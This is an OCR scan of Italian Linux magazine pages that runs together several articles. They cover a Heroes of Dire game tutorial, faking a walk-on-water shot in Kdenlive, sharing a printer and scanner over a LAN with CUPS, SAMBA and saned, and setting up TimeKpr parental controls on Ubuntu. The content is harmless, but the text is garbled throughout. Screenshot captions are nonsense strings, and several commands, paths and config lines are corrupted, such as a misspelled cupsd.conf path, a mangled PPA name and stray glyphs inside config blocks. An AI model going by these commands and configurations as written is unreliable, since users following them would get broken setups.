tiamo i termini di licenza (Accept), quindi 
inseriamo nome account, password (da 
digitare 2 volte] e un indirizzo mail valido 
poiché ci verrà inviato un messaggio con un 
link sul quale cliccare per validare e attiva- 
re l'account. Confermiamo con Submit. 


In HoD tre sono gli aspetti da considerare 
e da padroneggiare. Utilizzare in maniera 
opportuna i vari combattenti poiché ognuno 
presenta proprie caratteristiche e specificità 
che possono rilevarsi un'ottima scelta per 
un tipo di attacco, ma meno adatti sotto 
altri punti di vista. Diventa quindi di rilevante 
importanza con chi vengono. associati 
durante la composizione della squadra. Non 
da meno, aspetti come il saper controllare 
i movimenti dei combattenti durante le 
battaglie e le modalità di esplorazione 
‘ dell'ambiente di battaglia in funzione della 
caratteristiche del combattente: ad esempio, 
la capacità o meno di colpire a distanza (con 
arco e freccia piuttosto che con qualche 
magia che potrebbe generare un danno 
minore all'avversario). 

Capiremo quando colpire l'avversario poiché 
lampeggerà di rosso nel perimetro della sua 
figura. Per compiere questa operazione è 
sufficiente cliccare in basso a destra su una 
delle voci, qualora ve ne fosse più di una, 
che indica il tipo di attacco da sferrare. Su 
‘ogni combattente è presente una barra 
rossa con un numero ad indicare il livello di 


ERAPRICS SETTINES x 
Low Men MAX 


FULL'SCREEN MODE 


Min 
LOW POWER MODE 
SHADOWS CAMERA EFFECTS 
TE RESILUTION E 
WS2X 859 


e - 13 nno 
PAL intaarace Sx 122 BUE 


GRAFICA 
02 Creato l'account, verremo 

rediretti al menu principale 
(Fig: 1). Iniziamo a configurare il gioco. 
Clicchiamo su Settings, quindi su Gra- 
phics. Nella nuova pop-up abilitiamo la 
modalità a tutto schermo (Full Screen 
Mode] e le ombre (Shadows). Regoliamo 
la risoluzione (Resolution] al valore otti- 
male per il monitor in uso. 


vita. In funzione del tipo di attacco possiamo 
infliggere un determinato danno e il valore 
è riportato in basso a destra come numero 
sull’arma scelta (lettere DMG): in sostanza se 


il nostro avversario è a un livello di vita uguale 


a 1000, colpendolo con l’arma che provoca 
un danneggiamento di 250 il suo livello di 
vita scenderà a 750. È presente un altro 
numero con una clessidra ad indicare che se 
viene utilizzata quella data arma si dovranno 


TY INIIWE SETTIMEE 


dè Reser Dersu Keys 


COMANDI 
03 Infine, con i pulsanti in basso 

Size regoliamo le dimensioni 
dell'interfaccia uomo-macchina. Ese- 
guiamo le regolazioni a noi più conso- 
ne con l'audio attraverso il pulsante 
Sound e alcune possibili interazioni con 
il gioco [Gameplay]. Per imparare gli 
immancabili comandi da tastiera spo- 
stiamoci in Keybinds. 


attendere i prossimi X turni. | tumi di gioco 
sono indicati in una tabella in alto a sinistra 
dell'interfaccia, sotto il nome della mappa in 
uso. Coloro i quali dovessero appassionarsi 
a questo titolo, inevitabilmente dovranno 
approfondire altri aspetti del gioco, nel qual 
caso il suggerimento è la consultazione del 
Wiki dedicato (https/dire.wiki) e poiche il 
gioco è supportato anche su Android e ha 
una sua app free nello store di Google, chi 


OCCHIO ALLE RISORSE! 


Un titolo da non sottovalutare 


Sebbene la grafica possa sembrare sem- 
plice, in realtà è tutto curato fin nei piccoli 
dettagli: le fiammelle delle candele sui 
lampadari e sui tavoli, la fiamma delle 
torce, le ombre, gli effetti speciali e mol- 


to altro. Tutto ciò ha un costo in termini 
di risorse! Per godere appieno del titolo 
è suggerito attivare tutti i parametri per i 
massimi valori nel qual caso necessitere- 
mo almeno di un processore (Intel o AMD) 


dual core da 2,5 GHz, una scheda grafica 
AMD della serie HD 5xxx [o equivalente 
NVIDIA, ad esempio una GT610) con alme- 
no 1 GB di memoria video e attivata in har- 
dware l'accelerazione 3D tramite appositi 
driver. Lo spazio occupato su disco è di 
circa 100 MB (il client del gioco), necessari 
4 GB di RAM e indispensabile una connes- 
sione xDSL senza limiti di tempo e/o volu- 
mi di traffico. 


Heroes or Dire TutoRIAL 


LOGIN 

Al primo login verrà lanciato 

automaticamente un breve 
tutorial: da seguire al fine di capire 
la dinamica del gioco. Dopo il cari- 
camento iniziale (visibile in figura] si 
alterneranno S finestre di pop-up che 
con frasi spot’ ci illustreranno gli 
obiettivi che dovremo conseguire in 
questa prima fase. 


L'AMBIENTE 

Al termine delle prime 5 pop- 

up inizierà il gioco. L'inter- 
faccia è ricca di voci: la dimensione, se 
infastidisce durante il gioco, possiamo 
ridurla così come indicato nel Passo 3 
del tutorial precedente. In questa prima 
fase l'obiettivo sarà spostare il nostro 
avatar e annientare l'avversario presen- 
te sulla parte opposta dell'ambiente. 


La prima gara ufficiale 


È ora di fare sul serio: diamo inizio ai giochi 


SCELTA 

Alla successiva connessione 

verra aperta la mappa dell'am- 
biente. Per spostare l'avatar è sufficiente 
cliccare con il tasto sinistro {o destro) del 
mouse su una delle caselle della mappa. 
Facciamo presente che non c'è abbinamen- 
to causale îra le caratteristiche di una ca- 
sella e l'ambiente di combattimento il quale 
verrà generato casualmente. 


STAI 


COMBATTENTI 

Gli avatar in colore rosso 

fanno parte della intelligenza 
artificiale del gioco {AI} mentre quel- 
li di colore giallo sono veri giocatori 
online. Possiamo renderci conto di ciò 
cliccando su uno di essi e, dal menu 
contestuale, scegliamo Player: verran- 
no evidenziate tutte le caratteristiche 
di quel combattente. 


HKE 


New Puaver Gumne 


PROMEMORIA 

Durante le fasi iniziali verrà 

illustrato cosa fare passo dopo 
passo fino a raggiungimento dell'obiettivo 
finale. Ricordiamo che il gioco avviene su 
una sorta di scacchiera ed è a turni come 
il gioco degli scacchi. Terminato il tutorial 
apparirà una guida per nuovi giocatori. 
Possiamo accedere a questa guida veloce 
cliccando su Help nell'interfaccia di gioco. 


DireLenyt 


SI GIOCA! 

Iniziamo con i BOT perché tra i 

giocatori c'è chi conoscono bene 
ilgioco e non avremo possibilità di vittoria. 
Clicchiamo su un BOT e dal menu conte- 
stuale optiamo per Attack. Verrà caricata 
la mappa di gioco (Insignificant City] e su- 
bito dopo partirà la fase a turni. In figura, 
la mappa Keep of Beginning dopo essere 
arrivati al livello Novice e al livello 3. 
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Con Kdenlive 
cammini sull'acqua! 


BI Grazie alla potenza della computer grafica, possiamo 
camminare su uno specchio d’acqua senza bisogno di miracoli, 
super poteri o trucchi da illusionista. Ecco come fare 


a gli effetti speciali di un film non 

ci sono soltanto le esplosioni e le 

spade laser: a volte si può voler 
realizzare qualcosa di più “biblico”, come 
il camminare sulle acque. È una scena 
ad effetto, perché suggerisce che l’attore 
abbia qualche tipo di super potere, oppure 
perché è semplicemente qualcosa di 
bizzarro che colpisce l’attenzione del 
pubblico. Esistono diversi metodi per fare 
questo specifico effetto “in camera”, ma 
non sono molto pratici. Si basano più che 
altro sul sospendere l’attore con due fili 
di acciaio e un'imbragatura, oppure sul 
posizionare una lastra di vetro sotto la 
superficie dell’acqua sulla quale l’attore 
può camminare. Il problema è che queste 


cose richiedono molto denaro e una buona 
organizzazione, ed in certi casi non sono 
nemmeno fattibili (ad esempio quando non 
si ha a disposizione un bacino d’acqua). 
Possiamo però realizzare questo effetto con 
Kdenlive, non soltanto risparmiando tempo 
e denaro, ma anche ottenendo la possibilità 
di sistemare il filmato secondo le nostre 
esigenze. 

Cominciare a costruire il filmato è abbastanza 
semplice: prima di tutto ci serve un video in 
cui è ripreso un bacino d’acqua, poi una clip 
con l’attore che finge di camminarci sopra. 
Poiché dovremo estrarre l’attore dalla propria 
clip e sovrapporlo a quella dell’acqua, 
l'attore deve essere posizionato davanti 
ad un telo verde. Si può scegliere qualsiasi 


altro colore, ma il verde è di solito quello 
che funziona meglio. Sfruttando poi l’effetto 
di chiave cromatica, Kdenlive cancellerà 
tutti gli oggetti dello stesso colore del telo, 
rendendoli trasparenti. Per dare davvero 
l’idea di essere sull'acqua, però, dobbiamo 
dare all’attore un riflesso. L'operazione 
non è troppo complicata: basta duplicare 
la clip video dell’attore, con tutti gli effetti 
applicati, e aggiungere l’effetto Mirror (cioè 
specchio). Con qualche piccola accortezza 
sul metodo di sovrapposizione, potremo 
dare l’illusione di un vero riflesso. Nel nostro 
esempio, abbiamo deciso di realizzare una 
complicazione: di solito, infatti, quando 
si vuole mostrare un attore che cammina 
sull’acqua lo si riprende dal fianco, così che 


La semplice sovrapposizione 


Inseriamo la clip con l’attore sopra lo sfondo 
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POI LA TRANSIZIONE 


Cominciamo inserendo nella traccia Video1 la 

clip video contenente lo sfondo, cioè la bacinella 
d’acqua. Nella traccia Video2 inseriamo invece la clip con 
l’attore con il telo verde. ; 


Provvediamo, se necessario, a tagliare le clip 

con lo strumento forbici. Inseriamo tra le due 
clip una transizione di tipo Affine, estendendola ovvia- 
mente per tutta la durata delle clip. 
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la sua camminata appaia su una unica 
linea orizzontale. Noi invece mostriamo 
come realizzare questo effetto con un 
attore che cammina in direzione della 
cinepresa, quindi lungo unalinea verticale. 
Questa è ovviamente una complicazione 
perché significa che il riflesso dell’attore 
dovrà essere riposizionato. Infatti, a 
causa del concetto stesso di specchio, 
se l’attore si avvicina alla cinepresa il 
suo riflesso tenderà ad andare nella 
direzione opposta (mentre con un 
vero riflesso ciò non avviene). Niente 
di difficile, comunque: le transizioni di 
Kdenlive ci permettono di spostare la clip 
video in modo praticamente ‘automatico. 


attore è stato ripreso davanti ad un telo di colore verdi che ora faremo sparire © 
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SIERIGRITESIA MATALCAGAGAALITAI VILCISIEAIAI ALIA 


Aggiungiamo alla clip che contiene l'attore un effetto di 
tipo Chiave cromatica. Utilizzando il pulsante di selezio- 


Utilizzando i fotogrammi chiave, infatti, 
dobbiamo soltanto indicare la posizione 
iniziale della clip che contiene il riflesso 
dell'attore, e la sua posizione finale. 
Il programma calcolerà tutti gli altri 
fotogrammi automaticamente. Per 
rendere questa immagine, poi, un vero e 
proprio riflesso, utilizzeremo la modalità 
di sovrapposizione Hard light. Questa 
fa in modo che si veda l’immagine del 
riflesso, ma che si possano anche notare 
le linee delle onde dell’acqua sotto di 
essa, per dare davvero l’illusione che il 
riflesso stia comparendo sulla superficie 
dell’acqua. Ecco un filmato d'esempio: 
www.edmaster.it/url/6948. 
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II Fig. 1 - Sotto l'attore appare il suo 
riflesso nell'acqua 
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ROTOSCOPING 


Ovviamente possiamo anche aggiungere altre Chiavi 
cromatiche, in modo da cancellare anche altre sfuma- 


ne colore, clicchiamo sul telo verde per selezionare quella tinta. Poi 
modifichiamo la varianza in modo da non cancellare parti dell'attore. 
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LA SAGOMA 
03 Il rotoscope ci permette di eliminare tutto ciò che si trovà 
all'esterno della sagoma che disegniamo, quindi pos- 
siamo far sparire eventuali parti dell'inquadratura. Però l'effetto va 
trascinato sopra alle varie chiavi cromatiche, per funzionare. 
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ture [come le ombre del telo). Se necessario aggiungiamo pure un 
effetto Rotoscoping disegnando la sagoma del telo verde. 
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POSIZIONAMENTO a 
04 Lavorando sulla transizione Affine, decidiamo la posi- 
zione dell'attore: dobbiamo spostarlo proprio sopra il 
livello dell’acqua. Può anche essere necessario aumentare o dimi- 
nuire la dimensione dell'attore per adattarlo alla scena. 


RI Fig. 2- Man mano che l'attore si sposta, 
il suo riflesso lo segue 


Prepariamo il riflesso 


Una delle opzioni più semplici, — 
ovviamente, consiste nel procurarsi 

‘ una fotografia di un lago o un qual- 
siasi altro bacino d’acqua. Tuttavia, 
il problema di una foto è che risul- 
ta inevitabilmente falsa: è troppo 
ferma. L'acqua, anche quella di uno 
stagno o una bacinella, deve avere 
un' minimo movimento. Inoltre, è 
ovvio che l'acqua debba muoversi 
almeno un po’ quando qualcuno 
ci cammina sopra, è intuitivo. La 


Ms uu b..ta immi.ei d--ipca 


RENDERE L'ACQUA PIÙ REALISTICA 


soluzione più semplice consiste 

nel perturbare l'acqua in qualche 
‘modo, producendo del vento con uno 
strumento per soffiare le foglie dai 
marciapiedi, gettando un sasso, o 
colpendo il fondo della bacinella. Poi 
basta tagliare la clip video in modo 
che si vedano soltanto le onde, e 

non l'entità che le ha provocate [ad 
esempio, il sasso non si vede più una 
volta che è andato a fondo, ma le 
onde rimangono per un po’). 


L'attore deve specchiarsi nell’acqua, quindi costruiamo il suo riflesso 
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DUPLICAZIONE 

Quando l'immagine dell'attore è pulita ed in posi- 

zione, prendiamo lo strumento forbici e tagliamo 
la clip a metà. Poi, spostiamo la seconda metà sulla traccia 
Video3, mantenendo l'allineamento, e estendiamo le due 
clip in modo che tornino come l'originale. 


‘roject Bin ? © | (E) Effetti per c0003.MPA ei 


|Feathering passes i al 


sie Ia 


®© + @ 00:90:00:16 3 


C0003.MP4 
00:00:29:02 (2) 


Chiave cromatica 


è 
I] 
> 
< 
>| tb 


Chiave cromatica o=AvI 


f) 
Il 

JENGi > 
Gio 


UNO SPECCHIO 

La clip della traccia Video3 deve ora essere ri- 

baltata. Possiamo farlo aggiungendo ad essa 
l'effetto Mirror, impostando la direction su Flop. Volen- 
do, questa operazione si può fare sulla clip di traccia Vi- 
deo2 invece che Video3. 


Timeline Monitor View. Impostazioni | Aiuto 


Annulla DD copia ©) Esporta 


Composite and transform v. track | EVideo1 » 


fr { 


G + © !Predefinito v\ 4 Ss 


Gift) 


Compositing 


LA TRANSIZIONE 

In questa fase ci ritroviamo con due clip perfet- 

tamente identiche fra loro. Aggiungiamo tra le 
tracce Video3 e Video2 una transizione di tipo Composite 
and transform. La transizione deve essere riferita alla 
traccia Video1. 
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AL POSTO GIUSTO 

È necessario scegliere la posizione di inizio di 

questo riflesso sull'acqua dell'attore. Basta 
andare sulla transizione Composite and transform e sce- 
gliere la posizione giusta, di modo che l'immagine sembri 
davvero speculare. 
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Un riflesso più realistico 


Ribaltare l’immagine non basta: dobbiamo anche curare luce e posizione 
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IN MOVIMENTO 
0 1 Rimanendo sulla transizione, spostiamoci in avanti fino al 
momento in cui l'attore smette di camminare. A questo 
punto si deve aggiungere un nuovo fotogramma chiave, modificando 
la posizione del riflesso in modo che sia di nuovo allineato. 
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MENO CONTRASTO 

Sarà probabilmente necessario modificare il contrasto 

abbassandolo. Quindi aggiungiamo alla clip del riflesso 
l'effetto Contrasto, portando il valore sotto i 200 punti. È necessario 
riuscire a vedere i movimenti dell’acqua sotto al riflesso dell'attore. 
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ili CORRERE 


SOVRAPPOSTO 
0 5 Nella traccia Video4 non facciamo altro che inserire 
la stessa clip di sfondo iniziale, quella con la bacinella 
d'acqua. Impostiamo anche una transizione composito per que- 
sta clip che sia riferita proprio alla traccia Video1, per avere una 
perfetta sovrapposizione. 
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LA LUCE FORTE 
0 Per trasformare l'attuale immagine in un vero riflesso, in 
sovraimpressione rispetto all'acqua, il compositing della 


transizione deve essere impostato a Hard light. Per una sovraim- 
pressione più leggere si può scegliere Soft light oppure Overlay. 
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NUOVA TRACCIA 

Per completare il filmato, ci serve una quarta traccia. 

Possiamo aggiungerla cliccando col tasto destro del 
mouse sulla traccia Video3, e scegliendo Inserisci nuova traccia. 
La traccia video va inserita sopra la Video3. 
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CON UN RITAGLIO 
0 Aggiungiamo alla clip della traccia Video4 un ef- 
fetto Rotoscoping disegnando il contorno della 
parte inferiore della bacinella d'acqua, in modo da far spa- 
rire la parte del riflesso dell'attore che altrimenti uscireb- 
be dal bordo dell’acqua. 
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egli ultimi anni, i PC sono diventati sem- 
N- più piccoli e le stampanti sempre più 

grandi. L'uso di stampanti laser, infatti, è 
aumentato molto anche in ambito domestico, grazie 
al loro basso costo e alla semplicità d’uso. Tuttavia, 
la maggior parte di queste stampanti richiede una 
connessione USB, e questo significa che in teoria è 
possibile utilizzarla su un solo computer alla volta. 
Ma, si sa, fra le mura domestiche (così come in uffi- 
cio) i PC pullulano. Anche i modelli che integrando 
una connessione Ethernet potrebbero non essere 
un’opzione valida, perché la stampante potrebbe 
dover essere tenuta in una stanza che non è rag- 


CONDIVIDI 
NELLA LAN LA. 


TUA STAMPANTE 


Scopriamo come utilizzare i server di stampa e scansione 
CUPS e SANED per rendere la nostra stampante/scanner 
multifunzione disponibile nella LAN 


giunta da cavi di rete. Esistono alcune stampanti più 
costose che offrono il Wi-Fi, ma in genere non sono 
del tutto controllabili. Ad esempio, le stampanti HP 
offrono un buon pannello di controllo, ma è abba- 
stanza scomodo da utilizzare. Altri modelli non lo 
offrono proprio, dunque l’unico modo per gestire la 
stampante è alzarsi e andare fisicamente davanti ad 
essa. Come fare per avere una stampante accessibi- 
le a chiunque e facilmente controllabile dal proprio 
PC? Semplice: basta condividerla nella propria rete 
locale usando CUPS. Inoltre, grazie all’integrazio- 
ne tra CUPS e SAMBA, è possibile permettere di 
stampare praticamente a qualsiasi dispositivo: dai 


computer dotati di GNU/Linux o Windows, agli 
smartphone Android. Tutto ciò che dobbiamo fare è 
trovare un PC a basso consumo (e costo), come un 
Raspberry Pi, e trasformarlo in un server di stampa 
usando le giuste configurazioni di CUPS. Inoltre, 
molte delle grandi stampanti sono in realtà dei di- 
spositivi multifunzione: hanno uno scanner, con il 
quale eseguire fotocopie o vere e proprie scansio- 
ni digitali. Ma si può condividere nella rete locale 
anche lo scanner, oltre alla stampante? Sì, grazie 
a saned, il demone che permette ad altri PC della 
LAN l’accesso agli scanner connessi tramite USB 
ad un computer che funge da server (magari, lo 


installiamo la stampante sul server 


Ecco come accedere al pannello di controllo di CUPS 


‘Amministrazione: 


Aggiungi una stampante 


Stampanti locali: + Santsung SCX-4600 Series (Samsung SCX-4600 Series) 
G510g-m [DB508A] (HP HP Officejet 4500 G5109-m) 
4500 G510g-m (HP Officejet 4500 G510g-m) 


Stampanti di rete rilevate: (© Officejot 4500 
© Officejet 
Altro stampanti di rete: © Internet Printing Protocol (ipp14) 


© Intemet Printing Prolocot (pps) 
AppSockelHHP JetDirect 


AMMINISTRAZIONE 


Il server si configura puntando il browser all'indiriz- 

zo https://indirizzo:631/admin, dove indirizzo è L'IP 
del server, e inserendo nome utente e password del sistema. 
Si può aggiungere una nuova stampante semplicemente cliccando 
sull'apposito pulsante. Tutto molto semplice! 
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Guida in linea 


Posizione: 


Amministrazione 


Aggiungi una stampante 


Nome: Samsung_SCX4600, Series 
Descrizione: Samsung SCX-4600 Series 


Connessione: usb:/Samsung/SCX-4600%20Series?serial=Z2VCBFFSC00811A8Interface=1 
Condivisione: Condividi questa stampante 
Marca: Samsung | Seleziona un'altra marca | 
Modello: {Samsung $€; 
Gamsung 


‘Samsung SCX-5639 Sertos PS (en) 
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STAMPANTE LOCALE i 

Siamo sul server, quindi installiamo una 

stampante locale. Fatto ciò, abilitiamo l'op- 
zione Condividi questa stampante. Ovviamente, è anche 
necessario assegnare alla stampante il corretto driver 
scegliendo fra quelli disponibili. 


Pronti a condividere la stampante? 


Abilitiamo SAMBA per consentire la stampa agli utenti della LAN 


LA CONDIVISIONE 


UTENTI E PASSWORD 


0 4 Per la condivisione della stampanti basta modificare 

il file di configurazione col comando sudo nano /etc/ 

samba/smb.conf. Un valido esempio di configurazione è dispo- 
nibile sulla pagina Web www.edmaster.it/url/6953. 


Aggiungi una stampante 


Add Printer 


DAL LATO CLIENT 
03 Da un altro computer della rete locale è possibile in- 
stallare la stampante usando il proprio CUPS, acce- 
dendovi tramite SAMBA. Infatti, basta scegliere la voce Windows 
Printer via SAMBA durante la procedura guidata di installazione. 


0 2 La prima volta per ciascuno degli utenti si deve lanciare 
il comando sudo smbpasswd -a utente. Poi è necessario 

riavviare il server. Da un altro PC è poi possibile verificare che l'ac- 
cesso sia possibile: digitiamo smbclient -U utente -L //indirizzo_IP/. 


Peso Home ffzeali Cissscs Hol: Jobs Prision 
Aggiungi una stampante 

Add Printer 

Connection: smi surmimeser iz Sansong_SCX3800_Sones 
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See "Netaork Printers” for the comect URI îo use with your printer. 


URL STAMPANTE 
04 L'indirizzo di una stampante SAMBA è qualcosa del tipo 
smb://indirizzo_IP/Samsung_SCX-4600_Series. Se, 
invece, si vuole usare IPP (Internet Printing Protocol), si può usare 
ipps://indirizzo_IP:631/printers/Samsung_SCX-4600_Series. 


stesso usato come server per la stampa). Questo 
sistema di scansione funziona tramite SANE, inve- 
ce che con Twain, ed è supportato da tutti i sistemi 
GNU/Linux, Mac OS X e anche Microsoft Win- 
dows (utilizzando l’apposito software di scansione 
SaneTwain). Per utilizzare lo scanner tutto quello 
di cui si ha bisogno è l’indirizzo IP del server ed 
un programma compatibile con il sistema SANE. 
Su GNU/Linux esistono tanti software: uno dei più 
semplici è Skanlite. 


CONFIGURIAMO 
CUPS E GLI UTENTI 


Per opzione predefinita, l'interfaccia web di CUPS 
non è accessibile da altri computer, quindi se stia- 


IS 


mo lavorando su un Raspberry Pi è ovvio che non 
potremmo utilizzarlo. Dobbiamo quindi abilitarla 
modificando il file di configurazione col comando 
sudo nano /ete/cups/cupsd.conf. 

Il file è abbastanza lungo, ma le opzioni che ci inte- 
ressano sono le seguenti: 


<Location /> 
Order allow, deny 
Allow all 
</Location> 
<Location /admin> 
AuthType Default 
Require user @SYSTEM 
</Location> 


<Location /admin/conf> 


AuthType Default 
Require user @SYSTEM 
</Location> 


Queste sezioni ci permettono di stabilire i vari 
livelli di protezione per le aree di CUPS. Nel 
nostro esempio, stiamo permettendo a chiunque 
di accedere alla home page di CUPS (quindi 
la pagina che troviamo all’indirizzo https.// 
indirizzo_IP_server:631/) però richiediamo 
un’autenticazione per accedere alle sezioni di 
amministrazione (/admin) e configurazione (/ 
admin/conf) del server di stampa. Quindi, tut- 
ti potranno vedere se il server funziona o se ci 
sono problemi, ma solo gli utenti autenticabili 
potranno applicare delle modifiche. In parti- 
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colare, l'istruzione @SYSTEM che abbiamo 
inserito indica che le credenziali utente richie- 
ste da CUPS dovranno essere quelle valide sul 
sistema operativo. Ad esempio, su un Raspber- 
ry Pi utilizzeremo probabilmente l’utente pi. 
Affinché questo utente possa essere davvero 
abilitato al controllo di CUPS, comunque, deve 
rientrare nel gruppo lpadmin, mentre affinché 
possa stampare è sufficiente che faccia parte 
del gruppo Ip. Possiamo aggiungere l’utente ai 
gruppi con il comando: 


sudo usermod -G sys,lp,lpadmin,% 
scanner, sambashare, saned pi 


Abbiamo aggiunto degli altri gruppi che per- 
mettono sia l’utilizzo di SAMBA per la condi- 
visione delle stampanti, sia saned per il control- 


lo dello scanner. 

Ovviamente, se non si vuole usare l’utente pi 
ma un altro basta aggiungere l’utente al sistema: 
sudo useradd gianni 

sudo passwd gianni 


e poi ripetere il comando usermod con il nome 
del nuovo utente (gianni, nell’esempio). 
Continuando a controllare il file cupsd.conf, vi 
sono altre righe interessanti: 


<Policy default> 
<Limit Send-Document Send-URI? 
Hold-Job Release-Job Restart-Jobì 
Purge-Jobs Set-Job-Attributes® 
Create-Job-Subscription Renew-Subì 
scription Cancel-Subscription? 
Get-Notifications Reprocess-Jobì 


Cancel-Current-Job Suspend-Currentà 
-Job Resume-Job CUPS-Move-Job} 
CUPS-Get-Document> 
Order deny,allow 
Allow all 
</Limit> 
<Limit CUPS-Add-Modify-Printer® 
CUPS-Delete-Printer CUPS-Add-3 
> Modify-Class CUPS-Delete-Class? 
CUPS-Set-Default CUPS-Get-Devices> 
AuthType Default 
Require user @SYSTEM 
Order deny,allow 
</Limit> 


Il file di configurazione, ed è questo il bel- 
lo di realizzare il proprio server di stampa 
invece di affidarsi alle funzioni di stampa 


Le scansioni viaggiano sulla rete 


Rendiamo accessibile lo scanner sulla rete locale con saned 


0 SERVER ATTIVO 


Di solito saned è già installato, ma la sua funzione di 
server non è attiva. Bisogna lanciare il comando sudo 
nano /etc/default/saned ed impostare il valore yes alla riga RUN. 
Il file dovrà avere l'aspetto della prima porzione del file scaricabi- 


le da www.edmaster.it/url/6954. 


RICONOSCIMENTO 

03 Il server va riavviato, per permettere a saned di co- 
minciare a funzionare. A questo punto i client dovreb- 

bero già essere in grado di rilevare lo scanner, ma si può mo- 
dificare il file /etc/sane.d/net.conf inserendo in fondo ad esso 
l'indirizzo IP del server. 
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0 LA RETE LOCALE 
Si devono poi specificare le reti o gli indirizzi IP ai 
quali è permesso utilizzare lo scanner: basta lan- 
ciare il comando sudo nano /etc/sane.d/saned.conf inserendo la 
propria LAN. Ad esempio, la rete potrebbe essere rappresen- 


tata dall'indirizzo IPv4 192.168.1.0/24. 


® Samsung : Samsung SCX-4600 Series 
net:192.168.1.66:xerox_mfpilibusb:001:010 


Hewlett-Packard : Officejet_4500_G510g-m 
hpaio:/net/Officejet_4500_G510g-m?ip=192,168.1.68port=2 


Ricarica elenco dei dispositivi @ Annulla 


Trovati i dispositivi: 


ò 


UNA SCANSIONE 


04 Ora, utilizzando un programma come Skanlite è 
possibile riconoscere lo scanner di reté ed ese- 

guire le scansioni. Il programma funziona esattamente 
come se lo scanner fosse collegato tramite USB, permet- 


tendo anteprime e modifica delle varie opzioni. 


di rete presenti di serie sulle stampanti mo- 
derne, ci permette di decidere chi può fare 
cosa. Ad esempio, con il codice qui pre- 
sentato stiamo indicando che alcune ope- 
razioni, come l’invio di lavori di stampa o 
la cancellazione dei lavori, possono essere 
fatte da chiunque, persino utenti non auten- 
ticati. Invece, l’aggiunta di nuove stampan- 
ti e la modifica di quelle esistenti richiedo- 
no un utente autenticato. 


CONDIVISIONE 
NELLA LAN CON SAMBA 


Naturalmente è poi necessario abilitare la 
condivisione della stampante su SAMBA, 
la rete di Windows che è ormai uno standard 
di fatto della condivisione delle stampanti. 
Basta modificare il file di configurazione di 
SAMBA con il comando sudo nano /etc/ 
samba/smb.conf e inserire alla fine di esso 
le sezioni dedicate alle stampanti: 


[global] 

load printers = yes 
printing = cups 

printcap name = cups 
disable spoolss = no 
printcap cache time = 60 
printer admin = @lpadmin 


La prima sezione ci permette di stabilire le 
caratteristiche di base del server: si tratta di 
cups, e gli utenti autorizzati a gestirlo fanno 
parte del gruppo Ipadmin. 


[printers] 
= All Printers 


path = /var/spool/samba 


comment 


“Ddl nisur IYSUA#ZION, ZU." 
Samsung SCX-4300, 2.0.0 
Samsung SCX-4500, 2.0.0 
Samsung SCX-4521F, 2.0.0 
Samsung SCX-4600, 2.0.0 
Samsung SCX-4623f, 2.0.0 


Samsung SCX-4623fw, 2.0.0 


Samsung SCX-470x Foomatic/lj5gray 


Samsung SCX-470x Foomatic/pxImono 


| Fig. 1 - Condividendo la stampante con CUPS e SAMBA possiamo usarla 


anche dallo smartphone 


browseable = yes 
guest ok = yes 
writable = no 
printable = yes 
create mask = 0700 

Possiamo indicare una serie di opzioni: 
browseable significa che altri sistemi potran- 
no ottenere l’elenco delle stampanti del ser- 
ver, ed è fondamentale perché così le stam- 
panti verranno rilevate automaticamente. Poi, 
guest ok permette di stabilire che anche gli 
utenti “ospite” possono stampare, e printa- 
ble indica semplicemente che al momento è 
permesso stampare con questo server. Al di 
là dell’accesso da ospite, per ciascuno degli 


utenti che devono poter stampare con il no- 


stro server si deve lanciare il comando sudo 
smbpasswd -a utente scrivendo la password 
dell’utente. Poi si deve riavviare il sistema (0 
eventualmente soltanto i servizi di sistema 
CUPS e samba). Da un altro PC è poi pos- 
sibile verificare che l’accesso sia davvero 
possibile: 


smbclient -U utente -L //3 
indirizzodelserver/ 


per ottenere l'elenco delle varie risorse accessibili. 


UNA NOTA 
SUGLI SCANNER 


La configurazione di saned per condividere 
lo scanner sulla rete locale è molto sempli- 
ce, basta seguire la nostra guida. Ovvia- 
mente, prima di cominciare è molto impor- 
tante verificare che sul server lo scanner sia 
connesso e correttamente riconosciuto. Per 
farlo basta lanciare scanimage -L che elen- 
ca gli scanner disponibili. La maggior parte 
degli scanner viene riconosciuta automati- 
camente: nel caso in cui così non fosse, si 
può installare il driver hplip per i prodotti 
HP e il suldr per i Samsung (il cui reposi- 
tory Debian può essere aggiunto seguendo 
le istruzioni del sito ufficiale del progetto 
www.bchemnet.com/suldr). 

Per altri produttori, è importante verifica- 
re la disponibilità di driver sviluppati per 
piattaforma GNU/Linux!. 
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PC di casa è liberamente utilizzabile da tutti? 
che dai minori? È bene monitorare l'uso che 

se ne fa e, magari, limitarne il tempo di utilizzo. Ciò 
perché è senza dubbio importante evitare che un 
bambino passi intere giornate di fronte al monitor e 


PARENTAL 
CONTROL? FAGILE 
CON UBUNTU! 


Configuriamo la distro firmata Canonical per far sì che 
i più piccoli non trascorrano intere giornate di fronte al PC 


magari che trascorra parte del suo tempo libero an- 
che per socializzare o fare sport. Per non parlare poi 
ai pericoli ai quali un minore può essere sottoposto 
nel caso in cui navighi liberamente sul Web. Ma, 
per fortuna, possiamo limitare il tempo di utilizzo 


Mario Bonofiglio 


di un PC equipaggiato con Ubuntu. Ad aiutarci c'è 
TimeKpr, un software specializzato proprio in ciò 
che fa per noi: definisce orari e tempi limite di uti- 
lizzo; superato un determinato periodo di tempo, 
TimeKpr disconnette l'utente (automaticamente). 


onofiglio 


Prima di tutto aggiungiamo il PPA alla lista dei sor- 
©” genti. Lanciamo il comando sudo add-apt-repository 
ppa: impasnlkdapa e confermiamo con Invio. Successivamente, 
aggiorniamo la lista pacchetti: sudo apt-get update. 


statusi Limits & Boundaries. 


Status for mario 


Able to login all daytoday: », 
{Also active bypass) 


Limited by access duration (any day): 


Limited by time frame {any day): 


in pannello Status è è quello informativo. In alto a de- 
stra possiamo selezionare uno degli utenti del siste- 
ma e, in basso, verifichiamo che tutti i lucchetti siano aperti: ciò 
significa che l'utente può operare come vuole. 


52 se Linux Magazine 


Una volta aggiornata la lista pacchetti lanciamo 
sudo apt-get install timekpr. Al termine dell'instal- 
lazione, rechiamoci nella dash di Unity e lanciamo il software 
TimeKpr Control Panel. 


1 


Status | [Limits & Boundariesi 


E Limit access duration Everyday. Mon Tue Vv 


>E Limit time frame 


IL on pannello, Limit&Boundaries, consen- 
te di personalizzare la configurazione utente. Ci 
sono numerose combinazioni per un controllo parentale 
completo e flessibile. 


Padroni del tempo! 


Ecco come configurare i limiti temporali per ogni singolo utente 


itatus | Limits & Boundaries| °°° 


® SLimit access duration Everyday Mot 


minutes[ 9d \2) 


Every day 


F) configure per day 


Moni 


DM ÈELimit time frame 


t 


SERA d Hi 
Mid ” ( 
